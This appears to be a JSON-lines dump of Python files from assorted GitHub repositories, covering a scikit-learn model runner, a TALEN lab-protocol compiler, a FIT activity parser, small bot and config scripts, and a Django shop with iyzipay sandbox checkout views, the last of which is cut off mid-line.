_label_encode_dataframe(self, df):\r\n \"\"\"\r\n Label encode categorical columns of a dataframe\r\n \"\"\"\r\n df_encoded = df.copy()\r\n encoders = {}\r\n for column in df.columns:\r\n if df[column].dtype == 'object':\r\n encoder = LabelEncoder()\r\n df_encoded[column] = encoder.fit_transform(df[column])\r\n encoders[column] = encoder\r\n return df_encoded, encoders\r\n \r\n def _initialize_model(self, model_name, params):\r\n \"\"\"\r\n Initialize the model based on the algorithm and hyperparameters\r\n \"\"\"\r\n\r\n # Default parameters for each classifier\r\n defaults = {\r\n \"DecisionTree\": {\r\n 'criterion': 'gini',\r\n 'splitter': 'best',\r\n 'max_depth': None,\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_features': None,\r\n 'random_state': None,\r\n 'max_leaf_nodes': None,\r\n 'min_impurity_decrease': 0.0,\r\n 'class_weight': None,\r\n 'ccp_alpha': 0.0\r\n },\r\n \"RandomForest\": {\r\n 'n_estimators': 100,\r\n 'criterion': 'gini',\r\n 'max_depth': None,\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_features': 'sqrt',\r\n 'max_leaf_nodes': None,\r\n 'min_impurity_decrease': 0.0,\r\n 'bootstrap': True,\r\n 'oob_score': False,\r\n 'n_jobs': None,\r\n 'random_state': None,\r\n 'verbose': 0,\r\n 'warm_start': False,\r\n 'class_weight': None,\r\n 'ccp_alpha': 0.0,\r\n 'max_samples': None\r\n },\r\n \"SVM\": {\r\n 'C': 1.0,\r\n 'kernel': 'rbf',\r\n 'degree': 3,\r\n 'gamma': 'scale',\r\n 'coef0': 0.0,\r\n 'shrinking': True,\r\n 'probability': False,\r\n 'tol': 0.001,\r\n 'cache_size': 200,\r\n 'class_weight': None,\r\n 'verbose': False,\r\n 'max_iter': -1,\r\n 'decision_function_shape': 'ovr',\r\n 'break_ties': False,\r\n 'random_state': None\r\n },\r\n \"GradientBoosting\": {\r\n 'loss': 'deviance',\r\n 'learning_rate': 0.1,\r\n 'n_estimators': 100,\r\n 'subsample': 1.0,\r\n 'criterion': 'friedman_mse',\r\n 'min_samples_split': 2,\r\n 'min_samples_leaf': 1,\r\n 'min_weight_fraction_leaf': 0.0,\r\n 'max_depth': 3,\r\n 'min_impurity_decrease': 0.0,\r\n 'min_impurity_split': None,\r\n 'init': None,\r\n 'random_state': None,\r\n 'max_features': None,\r\n 'verbose': 0,\r\n 'max_leaf_nodes': None,\r\n 'warm_start': False,\r\n 'validation_fraction': 0.1,\r\n 'n_iter_no_change': None,\r\n 'tol': 0.0001,\r\n 'ccp_alpha': 0.0\r\n }\r\n }\r\n\r\n classifier_mapping = {\r\n \"DecisionTree\": DecisionTreeClassifier,\r\n \"RandomForest\": RandomForestClassifier,\r\n \"SVM\": SVC,\r\n \"GradientBoosting\": GradientBoostingClassifier\r\n }\r\n\r\n alg = params[\"algorithm\"]\r\n\r\n # Update defaults with provided parameters and filter out invalid parameters\r\n valid_params = {k: v for k, v in {**defaults[alg], **params}.items() if k in signature(classifier_mapping[alg]).parameters}\r\n\r\n if alg == \"DecisionTree\":\r\n return DecisionTreeClassifier(**valid_params)\r\n elif alg == \"RandomForest\":\r\n return RandomForestClassifier(**valid_params)\r\n elif alg == \"SVM\":\r\n return SVC(**valid_params)\r\n elif alg == \"GradientBoosting\":\r\n return GradientBoostingClassifier(**valid_params)\r\n else:\r\n raise ValueError(f\"Unsupported algorithm: {params['algorithm']}\") \r\n def run_models(self):\r\n \"\"\"\r\n Train models based on the provided hyperparameters and predict on the test set\r\n \"\"\"\r\n for model_name, params in self.hyperparameters.items():\r\n model = self._initialize_model(model_name, params)\r\n model.fit(self.X_train, self.y_train)\r\n self.models[model_name] = model\r\n preds = model.predict(self.X_test)\r\n self.predictions[model_name] = preds\r\n self.confusion_matrices[model_name] = confusion_matrix(self.y_test, preds)\r\n # Check if the model has feature_importances_ attribute\r\n if hasattr(model, \"feature_importances_\"):\r\n self.feature_importances[model_name] = model.feature_importances_\r\n print(f\"{model_name} is finished.\")\r\n \r\n def get_predictions(self, model_name):\r\n return self.predictions.get(model_name, None)\r\n \r\n def get_confusion_matrix(self, model_name):\r\n return self.confusion_matrices.get(model_name, None)\r\n \r\n def get_feature_importances(self, model_name):\r\n \"\"\"\r\n Return feature importances as a sorted dataframe\r\n \"\"\"\r\n importances = self.feature_importances.get(model_name, None)\r\n if importances is None:\r\n return None\r\n \r\n df_importances = pd.DataFrame({\r\n \"feature\": self.X.columns,\r\n \"importance\": importances\r\n })\r\n return df_importances.sort_values(by=\"importance\", ascending=False).reset_index(drop=True)\r\n \r\n def plot_confusion_matrix(self, model_name):\r\n \"\"\"\r\n Plot confusion matrix as a heatmap\r\n \"\"\"\r\n matrix = self.get_confusion_matrix(model_name)\r\n if matrix is None:\r\n print(f\"No confusion matrix found for model: {model_name}\")\r\n return\r\n \r\n # Check if target variable was label-encoded\r\n if self.y.name in self.encoders:\r\n labels = self.encoders[self.y.name].classes_\r\n else:\r\n labels = self.y.unique()\r\n \r\n plt.figure(figsize=(8, 6))\r\n sns.heatmap(matrix, annot=True, fmt='g', cmap='Blues', \r\n xticklabels=labels,\r\n yticklabels=labels)\r\n plt.xlabel('Predicted Label')\r\n plt.ylabel('True Label')\r\n plt.title(f'Confusion Matrix for {model_name}')\r\n plt.show()\r\n\r\n def visualize_decision_tree(self, model_name):\r\n \"\"\"\r\n Visualize the decision tree using graphviz\r\n \"\"\"\r\n model = self.models.get(model_name, None)\r\n if model is None:\r\n print(f\"No model found with name: {model_name}\")\r\n return\r\n \r\n if not isinstance(model, DecisionTreeClassifier):\r\n print(f\"Model {model_name} is not a DecisionTree. Visualization only supports DecisionTree.\")\r\n return\r\n \r\n # Convert class names to string type\r\n str_class_names = [str(cls) for cls in model.classes_]\r\n \r\n dot_data = export_graphviz(model, out_file=None, \r\n feature_names=self.X.columns, \r\n class_names=str_class_names, \r\n filled=True, rounded=True, \r\n special_characters=True) \r\n graph = graphviz.Source(dot_data) \r\n return graph\r\n","repo_name":"hamid-shojaei/modelrunner","sub_path":"modelrunner/model_evaluator.py","file_name":"model_evaluator.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28149011752","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_csv('./data/train.csv')\ndf.dropna(axis=0)\n\ny = df['prix']\nx = df.drop('prix', axis=1)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=69)\n\ny_test.to_csv('./data/test2.csv', index=False, header=None)\ny_test.to_csv('./test2-predictions.csv', index=False, header=None)\n","repo_name":"nicoOkie/kaggle","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7923138473","text":"\"\"\"\nThis script takes a 15 nucleotide target sequence followed by a base pair\nrepresenting the receiver plasmid.\n\nIt outputs an OT-One protocol to assemble a TALEN protein with the pFusX\nsystem, which provides a pre-plated library of plasmids and a database\nof well positions for this script to query.\n\nInput is a string representing an RVD sequence, whitespace optional,\nsuch as:\n\n> NI NG NI HD HD NN NG HD NG NG NI NG NG NG NG\n\nOr DNA, such as:\n\n> ATACCGTCTTATTTT\n\nOutput is a JSON file which represents a protocol that can run on any\nOT-One machine.\n\"\"\"\n\nimport sys\nimport os\nimport re\nimport json\nimport datetime\n\nfrom labsuite.protocol import Protocol\nfrom labsuite.protocol.formatters import JSONFormatter\n\nfrom .plate_map import PlateMap\n\n_fusx_plates = PlateMap(\n os.path.dirname(__file__) + '/data/fusx_platemap.csv',\n rotated=True,\n TALE1='A33',\n TALE2='K33',\n TALE3='U33',\n TALE4='A48',\n TALE5='K48'\n)\n\n\ndef dna_to_rvd(string):\n \"\"\"\n Translates a DNA string to RVD.\n \"\"\"\n translation = {\n 'A': 'NI',\n 'C': 'HD',\n 'T': 'NG',\n 'G': 'NN',\n 'R': 'NN' # Just assume G if purine is unspecified.\n }\n string = string.upper()\n rvd = []\n for c in string:\n if c is 'Y':\n # Apparently for restriction enzymes pyridians need to be more\n # specific than purines.\n raise ValueError(\n \"Invalid base: 'Y'; pyrimidines must be specified.\"\n )\n elif c not in translation:\n raise ValueError(\"Invalid character: {}\".format(c))\n else:\n rvd.append(translation[c])\n return ' '.join(rvd)\n\n\ndef rvd_to_tal(string):\n \"\"\"\n Translates an RVD string into TAL.\n\n Very similar to a reverse of dna_to_rvd, but DNA->RVD2->TAL2 will return\n a normalized result rather than the original input.\n \"\"\"\n translation = {\n 'NI': 'A',\n 'HD': 'C',\n 'NG': 'T',\n 'NN': 'G'\n }\n out = []\n string = string.upper() # Convert input to uppercase;\n string = re.sub(r'[^A-Z]+', '', string) # remove any separators.\n codes = map(''.join, zip(*[iter(string)] * 2)) # Two-character segments.\n for code in codes:\n if code not in translation:\n raise ValueError(\"Invalid RVD sequence: {}\".format(code))\n else:\n out.append(translation[code])\n return ''.join(out)\n\n\ndef tal_to_codons(tal):\n \"\"\"\n Takes a 15 or 16-base ATGC sequence and outputs an array of five\n codon sequences after doing validation.\n \"\"\"\n if re.match(r'[^ACTG]', tal): # Content check.\n raise ValueError(\"FusX TALEN sequence must be in ACTG form.\")\n codons = []\n for n in range(0, 12, 3): # Chunk into four parts of 3.\n codons.append(tal[n:n + 3])\n codons.append(tal[12:]) # Grab the last 2, 3 or 4 bases.\n return codons\n\n\ndef get_plasmid_wells(sequence, receiver='pC'):\n \"\"\"\n Takes a string of either RVD or DNA basepairs (15 or 16), does a\n bunch of input normalization and outputs a hash containing well\n positions for pfusx_[1..5], receiver, and backbone.\n\n No plate data is necessary at the moment; those are hard-coded in the\n template.\n \"\"\"\n\n tal = rvd_to_tal(sequence) # Normalize the sequence.\n\n codons = tal_to_codons(tal[0:-1])\n pLR_bp = tal[-1] # Last base is the receiver.\n\n if len(codons[4]) > 4:\n raise ValueError(\"Sequence must be an array of five codons.\")\n\n # We only actually need well coordinates for these because the plate\n # names are hard-coded into the pFusX JSON template.\n well_locs = {}\n\n # We pull the FusX plasmid locations from the plate map, five in total.\n for i, codon in enumerate(codons):\n codon_index = i + 1\n plate_name = 'TALE{}'.format(codon_index)\n location = _fusx_plates.get_plate(plate_name).find_well(codon)\n if not location:\n raise ValueError(\n \"Can't find well position for '{}' on plate {}.\".\n format(codon, plate_name)\n )\n else:\n well_locs[plate_name] = location\n\n plate = _fusx_plates.get_plate('TALE5')\n well_locs['pLR'] = plate.find_well('pLR: {}'.format(pLR_bp))\n if not well_locs['pLR']:\n raise ValueError(\"Invalid pLR: {}\".format(pLR_bp))\n\n valid_receivers = ['pT3TS', 'pC', 'pKT3']\n if receiver not in valid_receivers:\n raise ValueError(\n \"Receiver must be one of: {}\"\n .format(\", \".join(valid_receivers))\n )\n\n rec_well = plate.find_well(receiver)\n if not rec_well:\n # No way to really test this bit without adding an invalid\n # receiver that doesn't exist in the plate mapping...\n raise ValueError(\n \"Can't find receiver well for '{}'.\".\n format(receiver)\n )\n well_locs['receiver'] = rec_well\n\n return well_locs\n\n\ndef _get_tal_transfers(sequence, well='A1', receiver='pC'):\n \"\"\"\n Creates an array of transfer arguments for a TAL sequence.\n \"\"\"\n\n output_well = \"FusX Output:{}\".format(well)\n plasmids = get_plasmid_wells(sequence, receiver)\n\n # TAL Plasmid transfers\n tals = []\n for n in range(1, 6): # TALEN plasmids, 1 through 5\n tals.append(\n (\n \"TALE{}:{}\".format(n, plasmids['TALE{}'.format(n)]),\n output_well,\n 3\n )\n )\n\n # pLR and Receiver transfers\n pLR = [('TALE5:{}'.format(plasmids['pLR']), output_well, 3)]\n receiver = [('TALE5:{}'.format(plasmids['receiver']), output_well, 3)]\n\n return tals + pLR + receiver\n\n\ndef _normalize_sequence(sequence):\n \"\"\"\n Validate and normalize input sequences to RVD.\n \"\"\"\n\n # Uppercase; no separators, A-Z only.\n sequence = sequence.upper()\n sequence = re.sub(r'[^A-Z]+', '', sequence)\n\n # Normalize to RVD input.\n if re.match(r'^[ATGCYR]*$', sequence): # Match: DNA bases.\n sequence = re.sub('\\s', '', dna_to_rvd(sequence))\n elif re.match(r'^[NIHDG]*$', sequence): # Match: RVD bases.\n sequence = sequence\n else:\n raise ValueError(\"Input must be a sequence of RVD or DNA bases.\")\n\n if len(sequence) not in [32, 30]:\n raise ValueError(\"Sequence must be 15 RNA or DNA bases.\")\n\n return sequence\n\n\ndef compile(*sequences, output=None):\n \"\"\"\n Takes a list of sequence arguments (RVD or DNA) and outputs a generated\n protocol to make plasmids targetting those sequences.\n \"\"\"\n sequences = list(sequences)\n\n # Limit right now is the number of tips in the static deck map we're\n # using for this protocol.\n if len(sequences) > 15:\n raise ValueError(\n \"FusX compiler only supports up to 15 sequences.\"\n )\n\n # Argument normalization.\n normalized = []\n for i, s in enumerate(sequences):\n try:\n normalized.append(_normalize_sequence(s))\n except ValueError as e:\n raise ValueError(\"Sequence #{}: {}\".format(i + 1, e))\n\n # Make the transfers for every sequence.\n buffers = []\n tals = []\n enzymes = []\n\n well_map = {}\n for n, s in enumerate(normalized):\n n = n + 1\n if n > 12:\n well = 'B{}'.format(n - 12)\n else:\n well = 'A{}'.format(n)\n # We're going to do all the buffers at the start...\n buffers += [('Ingredients:A1', 'FusX Output:' + well, 10)]\n # TALs in the middle...\n tals += _get_tal_transfers(s, well=well)\n # Enzyme (BsmBI) at the end.\n enzymes += [(\"Ingredients:B1\", 'FusX Output:' + well, 10)]\n # For printing an output map.\n well_map[well] = sequences[n - 1] # Map to original input.\n\n # Nicely formatted well map for the description.\n output_map = []\n for well in sorted(well_map):\n output_map.append(\"{}: {}\".format(well, well_map[well]))\n\n protocol = Protocol()\n protocol.set_info(\n name=\"FusX Transfer\",\n created=str(datetime.date.today()),\n description=\"; \".join(output_map)\n )\n protocol.add_instrument('A', 'p10')\n protocol.add_instrument('B', 'p200')\n protocol.add_container('A1', 'tuberack.15-50ml', label='Ingredients')\n protocol.add_container('E1', 'microplate.96', label='Fusx Output')\n protocol.add_container('A2', 'point.trash')\n protocol.add_container('E3', 'microplate.96') # Cool deck.\n protocol.add_container('B2', 'tiprack.p10')\n protocol.add_container('B1', 'tiprack.p10')\n protocol.add_container('B3', 'tiprack.p10')\n protocol.add_container('C1', 'microplate.96', label='TALE1')\n protocol.add_container('D1', 'microplate.96', label='TALE2')\n protocol.add_container('C2', 'microplate.96', label='TALE3')\n protocol.add_container('D2', 'microplate.96', label='TALE4')\n protocol.add_container('C3', 'microplate.96', label='TALE5')\n\n # Take our three transfer groups and make them into a consolidated\n # transfer list.\n\n # Buffers\n group = []\n for start, end, volume in buffers:\n group.append((start, end, {'ul': volume}))\n protocol.transfer_group(*group, tool=\"p10\")\n\n # TALS\n for start, end, volume in tals:\n protocol.transfer(start, end, ul=volume)\n\n # Enzymes\n for start, end, volume in enzymes:\n protocol.transfer(start, end, ul=volume)\n\n compiled = protocol.export(JSONFormatter)\n\n if output:\n with open(output, 'w') as f:\n f.write(compiled)\n\n return compiled\n","repo_name":"Yuffster/labsuite","sub_path":"labsuite/compilers/pfusx.py","file_name":"pfusx.py","file_ext":"py","file_size_in_byte":9473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70096616536","text":"from typing import List\n\nfrom schedule.data_transfer_objects.availability_dto import AvailabilityDTO\nfrom schedule.data_transfer_objects.service_dto import ServiceDTO\nfrom schedule.data_transfer_objects.vehicle_dto import VehicleDTO\n\n\ndef row_to_array(line: str) -> List[int]:\n array_line = line.replace(' \\n', '').replace('\\n', '').split(' ')\n\n return [int(x) for x in array_line]\n\n\ndef load_distances(file_name: str) -> List[List[int]]:\n distances_file = open(file_name, 'r')\n return [row_to_array(row) for row in distances_file]\n\n\ndef load_data(raw_data: List[str]) -> tuple[List['VehicleDTO'], List['ServiceDTO'], int]:\n vehicles_count = int(raw_data.pop(0))\n\n vehicles: List[VehicleDTO] = [VehicleDTO(0)]\n services: List[ServiceDTO] = [ServiceDTO(identifier=0, vehicle_identifier=0)]\n\n availability_counter = 1\n service_counter = 1\n\n for i in range(0, vehicles_count):\n row: list[int] = row_to_array(raw_data.pop(0))\n\n vehicle = VehicleDTO(identifier=row.pop(0))\n\n services_count = row.pop(0)\n for j in range(0, services_count):\n service = ServiceDTO(\n identifier=service_counter,\n vehicle_identifier=i + 1,\n start=row.pop(0),\n end=row.pop(0),\n duration=row.pop(0),\n address=row.pop(0),\n )\n\n vehicle.add_service(service)\n services.append(service)\n service_counter += 1\n\n availabilities_count = row.pop(0)\n for j in range(0, availabilities_count):\n vehicle.add_availability(AvailabilityDTO(\n identifier=availability_counter,\n vehicle_identifier=i,\n start=row.pop(0),\n end=row.pop(0),\n address=row.pop(0),\n ))\n availability_counter += 1\n\n vehicles.append(vehicle)\n\n for i in range(1, len(services)):\n services.append(ServiceDTO(\n identifier=len(services),\n vehicle_identifier=services[i].vehicle_identifier\n ))\n\n return vehicles, services, service_counter - 1\n","repo_name":"GrzegorzSikorski96/pwr-car-rental","sub_path":"schedule/generators/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7201155923","text":"import Base, Background\r\nimport UiInit\r\nimport os, importlib\r\nfrom qfluentwidgets import qrouter\r\n\r\n#Wrapper for main procedure\r\n#To be plug into Background.run\r\ndef wrapper():\r\n #Store returnValue into list, to emulate pass by pointer in Python\r\n returnValue = [0]\r\n def main():\r\n from UI import GUI\r\n class BGUI(GUI):\r\n #Custom exit function\r\n def exit(self, code=None):\r\n if code is None:\r\n code = self.app.exec_()\r\n returnValue[0] = code\r\n\r\n #Module initialization\r\n def refine(self):\r\n for suspect in UiInit.members:\r\n print(\"Loading %s\"%suspect)\r\n moduleName = suspect.rsplit(\".\", 1)[0]\r\n importlib.import_module(\"UiInit.%s\"%moduleName)\r\n getattr(UiInit, moduleName).Init(self)\r\n\r\n #GUI Initialization procedure & Main loop\r\n def launch(self):\r\n qrouter.setDefaultRouteKey(self.ui.stackedWidget, self.ui.Homepage.objectName())\r\n self.ui.stackedWidget.currentChanged.connect(self.interfaceChanged)\r\n self.ui.stackedWidget.setCurrentIndex(0)\r\n self.ui.NavigationBar.setCurrentItem(self.ui.Homepage.objectName())\r\n super().launch()\r\n\r\n MainWindow = BGUI()\r\n #Hijack exit function\r\n Background.exitFunc = MainWindow.forceQuit\r\n MainWindow.launch()\r\n\r\n #Return value hook\r\n def hook():\r\n return returnValue[0]\r\n\r\n return main, hook\r\n\r\n#Start program with wrapper(SQL initialization)\r\nBackground.run(*(wrapper()))\r\n","repo_name":"yl12053/_yl12053_SBAASSM","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4659103232","text":"from pathlib import Path\n\nimport fitdecode\n\nfrom gopro_overlay.entry import Entry\nfrom gopro_overlay.gpmf import GPSFix\nfrom gopro_overlay.point import Point\nfrom gopro_overlay.timeseries import Timeseries\n\n\ndef garmin_to_gps(v):\n return v / ((2 ** 32) / 360)\n\n\ninterpret = {\n \"position_lat\": lambda f, u: {\"lat\": garmin_to_gps(f.value)},\n \"position_long\": lambda f, u: {\"lon\": garmin_to_gps(f.value)},\n \"distance\": lambda f, u: {\"odo\": u.Quantity(f.value, u.m)},\n \"altitude\": lambda f, u: {\"alt\": u.Quantity(f.value, u.m)},\n \"enhanced_altitude\": lambda f, u: {\"alt\": u.Quantity(f.value, u.m)},\n \"speed\": lambda f, u: {\"speed\": u.Quantity(f.value, u.mps)},\n \"enhanced_speed\": lambda f, u: {\"speed\": u.Quantity(f.value, u.mps)},\n \"heart_rate\": lambda f, u: {\"hr\": u.Quantity(f.value, u.bpm)},\n \"cadence\": lambda f, u: {\"cad\": u.Quantity(f.value, u.rpm)},\n \"temperature\": lambda f, u: {\"atemp\": u.Quantity(f.value, u.degC)},\n \"gps_accuracy\": lambda f, u: {\"dop\": u.Quantity(f.value)},\n \"power\": lambda f, u: {\"power\": u.Quantity(f.value, u.watt)},\n \"grade\": lambda f, u: {\"grad\": u.Quantity(f.value)},\n}\n\n\ndef load_timeseries(filepath: Path, units):\n ts = Timeseries()\n\n with fitdecode.FitReader(filepath) as ff:\n for frame in (f for f in ff if f.frame_type == fitdecode.FIT_FRAME_DATA and f.name == 'record'):\n entry = None\n items = {}\n\n for field in frame.fields:\n if field.name == \"timestamp\":\n # we should set the gps fix or Journey.accept() will skip the point:\n entry = Entry(\n dt=field.value,\n gpsfix=GPSFix.LOCK_3D.value\n )\n else:\n if field.name in interpret and field.value is not None:\n items.update(**interpret[field.name](field, units))\n\n if \"lat\" in items and \"lon\" in items:\n items[\"point\"] = Point(lat=items[\"lat\"], lon=items[\"lon\"])\n del (items[\"lat\"])\n del (items[\"lon\"])\n\n # only use fit data items that have lat/lon\n if \"point\" in items:\n entry.update(**items)\n ts.add(entry)\n\n return ts\n","repo_name":"time4tea/gopro-dashboard-overlay","sub_path":"gopro_overlay/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"68"} +{"seq_id":"37385624404","text":"from enum import Enum\nfrom ctx import x\nfrom replies import Reply\nfrom telegram import KeyboardButton as Btn, ReplyKeyboardMarkup as Kbd\n\n\nclass RideVariant(Enum):\n HOURLY = 'Почасовой'\n DAILY = 'На весь день'\n BY_AMOUNT = 'На всю сумму'\n\n\ndef ride_hourly():\n u = yield 'На сколько часов?'\n while True:\n if u.message.text.isdigit() and 1 < int(u.message.text) < 11:\n break\n else:\n u = yield 'Неправильный ответ, ещё разок'\n hours = int(u.message.text)\n\n\ndef ride():\n u = yield Reply(\n 'Какой вариант вам подходит?',\n reply_markup=Kbd(\n [\n [Btn(RideVariant.HOURLY.value), Btn(RideVariant.DAILY.value)],\n [Btn(RideVariant.BY_AMOUNT.value)]\n ],\n one_time_keyboard=True,\n resize_keyboard=True\n )\n )\n\n\n\n","repo_name":"metheoryt/skatepark-telegram-bot","sub_path":"dialog/ride.py","file_name":"ride.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18691811156","text":"from configparser import ConfigParser, NoOptionError, NoSectionError\nimport sys\n\ncfg = ConfigParser()\ncfg.read(\"config.ini\")\n\ntry:\n APP_ID = cfg.getint(\"pyrogram\", \"api_id\")\n APP_HASH = cfg.get(\"pyrogram\", \"api_hash\")\nexcept (NoOptionError, NoSectionError):\n # sys.exit(print('fill in configs before making the session.'))\n print(\"Find your App configs in https://my.telegram.org\")\n APP_ID = int(input(\"Enter your api_id: \"))\n APP_HASH = input(\"Enter your api_hash: \")\n","repo_name":"pokurt/qr-Pyrogram-session","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"12803834116","text":"from django.shortcuts import render, redirect\nimport iyzipay\nimport json\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nimport requests\nfrom django.contrib import messages\nimport pprint\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.db.models import Q\n# import jsonresponse\nfrom django.http import JsonResponse\n# Create your views here.\n\napi_key = 'sandbox-P0pc0m5C6J5ZP28gkQpBVtRXrFRHm8mr'\nsecret_key = 'sandbox-5UKiwkqmhFYRq2gzn9iTPvKRFUfctyud'\nbase_url = 'sandbox-api.iyzipay.com'\n\noptions = {\n 'api_key': api_key,\n 'secret_key': secret_key,\n 'base_url': base_url\n}\n\n\nsozlukToken = list()\n\ndef payment(request):\n context = dict()\n sepetim = Odeme.objects.get(user = request.user)\n buyer={\n 'id': 'BY789',\n 'name': 'John',\n 'surname': 'Doe',\n 'gsmNumber': '+905350000000',\n 'email': 'email@email.com',\n 'identityNumber': '74300864791',\n 'lastLoginDate': '2015-10-05 12:43:35',\n 'registrationDate': '2013-04-21 15:12:09',\n 'registrationAddress': 'Nidakule Göztepe, Merdivenköy Mah. Bora Sok. No:1',\n 'ip': '85.34.78.112',\n 'city': 'Istanbul',\n 'country': 'Turkey',\n 'zipCode': '34732'\n }\n\n address={\n 'contactName': 'Jane Doe',\n 'city': 'Istanbul',\n 'country': 'Turkey',\n 'address': 'Nidakule Göztepe, Merdivenköy Mah. Bora Sok. No:1',\n 'zipCode': '34732'\n }\n\n basket_items=[\n {\n 'id': 'BI101',\n 'name': 'Binocular',\n 'category1': 'Collectibles',\n 'category2': 'Accessories',\n 'itemType': 'PHYSICAL',\n 'price': '0.3'\n },\n {\n 'id': 'BI102',\n 'name': 'Game code',\n 'category1': 'Game',\n 'category2': 'Online Game Items',\n 'itemType': 'VIRTUAL',\n 'price': '0.5'\n },\n {\n 'id': 'BI103',\n 'name': 'Usb',\n 'category1': 'Electronics',\n 'category2': 'Usb / Cable',\n 'itemType': 'PHYSICAL',\n 'price': '0.2'\n }\n ]\n\n request={\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'price': '1',\n 'paidPrice': sepetim.toplamFiyat,\n 'currency': 'TRY',\n 'basketId': 'B67832',\n 'paymentGroup': 'PRODUCT',\n \"callbackUrl\": \"http://localhost:8000/result/\",\n \"enabledInstallments\": ['2', '3', '6', '9'],\n 'buyer': buyer,\n 'shippingAddress': address,\n 'billingAddress': address,\n 'basketItems': basket_items,\n # 'debitCardAllowed': True\n }\n\n checkout_form_initialize = iyzipay.CheckoutFormInitialize().create(request, options)\n\n #print(checkout_form_initialize.read().decode('utf-8'))\n page = checkout_form_initialize\n header = {'Content-Type': 'application/json'}\n content = checkout_form_initialize.read().decode('utf-8')\n json_content = json.loads(content)\n print(type(json_content))\n print(json_content[\"checkoutFormContent\"])\n print(\"************************\")\n print(json_content[\"token\"])\n print(\"************************\")\n sozlukToken.append(json_content[\"token\"])\n return HttpResponse(json_content[\"checkoutFormContent\"])\n\n@require_http_methods(['POST'])\n@csrf_exempt\ndef result(request):\n context = dict()\n\n url = request.META.get('index')\n\n request = {\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'token': sozlukToken[0]\n }\n checkout_form_result = iyzipay.CheckoutForm().retrieve(request, options)\n print(\"************************\")\n print(type(checkout_form_result))\n result = checkout_form_result.read().decode('utf-8')\n print(\"************************\")\n print(sozlukToken[0]) \n print(\"************************\")\n print(\"************************\")\n sonuc = json.loads(result, object_pairs_hook=list)\n #print(sonuc[0][1]) # İşlem sonuç Durumu dönüyor\n #print(sonuc[5][1]) # Test ödeme tutarı\n print(\"************************\")\n for i in sonuc:\n print(i)\n print(\"************************\")\n print(sozlukToken)\n print(\"************************\")\n if sonuc[0][1] == 'success':\n context['success'] = 'Başarılı İŞLEMLER'\n return HttpResponseRedirect(reverse('success'), context)\n\n elif sonuc[0][1] == 'failure':\n context['failure'] = 'Başarısız'\n return HttpResponseRedirect(reverse('failure'), context)\n\n return HttpResponse(result)\ndef index(request):\n urunler = Urun.objects.all()\n kategoriler = Kategori.objects.all()\n sepet = Sepet.objects.filter(user = request.user)\n # uzunluk = len(sepet)\n # Arama\n search = ''\n if request.GET.get('search'):\n search = request.GET.get('search')\n urunler = Urun.objects.filter(\n Q(isim__icontains = search) |\n Q(kategori__isim__icontains = search)\n )\n if request.method == 'POST':\n urun = request.POST['urunId']\n adet = request.POST['adet']\n urunum = Urun.objects.get(id = urun)\n if Sepet.objects.filter(user = request.user, urun = urun).exists():\n sepet = Sepet.objects.get(user = request.user, urun = urunum)\n sepet.adet += int(adet)\n sepet.fiyat += int(adet) * urunum.fiyat\n sepet.save()\n \n else:\n sepet = Sepet(user = request.user, urun = urunum, adet = adet, fiyat = int(adet) * urunum.fiyat)\n sepet.save()\n uzunluk = Sepet.objects.filter(user = request.user)\n post = request.POST #Ajax'dan dönen post verilerini alıyoruz.\n\n # site_adi = post.get('site_adi') #Post değerinden site_adi verisini alıyoruz.\n\n # #Aynı şekilde diğer verileri de alıyoruz.\n # gonderen_kisi = post.get('urunId')\n # gonderilme_nedeni = post.get('adet')\n\n # result = True\n # message = \"\"\n # if site_adi==\"http://127.0.0.1:8000\":\n # message = \"http://127.0.0.1:8000 işlem başarılı\"\n # else:\n # message = \"Yazıklar olsun! :(\"\n # result = False\n\n\n \n context = {\n 'urunler':urunler,\n 'search':search,\n 'kategoriler':kategoriler,\n 'uzunluk':uzunluk,\n # 'result':result,\n # 'message':message\n }\n \n return render(request, 'index.html', context)\n\ndef detail(request, urunId):\n urun = Urun.objects.get(id = urunId)\n context = {\n 'urun':urun\n }\n return render(request, 'urun.html', context)\n\ndef olustur(request):\n form = UrunForm()\n if request.method == 'POST':\n form = UrunForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, 'Ürün oluşturuldu')\n return redirect('index')\n context = {\n 'form':form\n }\n return render(request, 'olustur.html', context)\n\n\n# ckeditor\n\n# Ödeme\ndef success(request):\n messages.success(request, 'Ödeme başarılı')\n return redirect('index')\ndef failure(request):\n messages.error(request, 'Ödeme başarısız')\n return redirect('payment')\n\ndef sepet(request):\n urun = Sepet.objects.filter(user = request.user)\n toplam = 0\n \n for i in urun:\n toplam += i.fiya\n \n if request.method == \"POST\":\n odeme = 